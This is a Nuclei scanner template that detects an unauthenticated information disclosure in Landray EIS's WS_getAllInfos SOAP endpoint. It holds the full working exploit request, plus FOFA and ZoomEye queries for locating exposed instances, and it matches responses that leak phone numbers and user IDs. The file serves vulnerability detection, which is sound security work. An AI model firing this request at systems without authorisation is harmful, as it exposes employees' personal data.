id: landray-eis-ws-infoleak

info:
  name: Landray EIS WS_getAllInfos - Information Disclosure
  author: Fur1na
  severity: high
  description: |
    Landray EIS WS_getAllInfos interface suffers from a sensitive information disclosure vulnerability.
  reference:
    - https://mp.weixin.qq.com/s/CTLyriSSF-nQ8SUFv4RX0A
    - https://github.com/akyosk/pocman/blob/main/cve/Lanling/Lanling_Info.py
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="Landray-EIS智慧协同平台"
    zoomeye-query: app:"蓝凌EIS智慧协同平台"
  tags: landray,eis,info-leak

http:
  - raw:
      - |
        POST /WS/Basic/Basic.asmx HTTP/1.1
        Content-Type: text/xml
        Host: {{Hostname}}

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
        <soapenv:Header/>
        <soapenv:Body>
        <tem:WS_getAllInfos/>
        </soapenv:Body>
        </soapenv:Envelope>

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<?xml"
          - "WS_getAllInfosResponse"
          - "CELL_PHONE_NUMBER"
          - "UNID"
        condition: and

      - type: word
        part: header
        words:
          - "Content-Type: text/xml"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100af7dab2d7100054862f33ac2b4f1227eef14f612e49c0298b779411f29bfc00f02203a74b5f90676f4f90d6a321b4b30d0e2284d6064a992f459e2dfebca990c0147:922c64590222798bb761d5b6d8e72950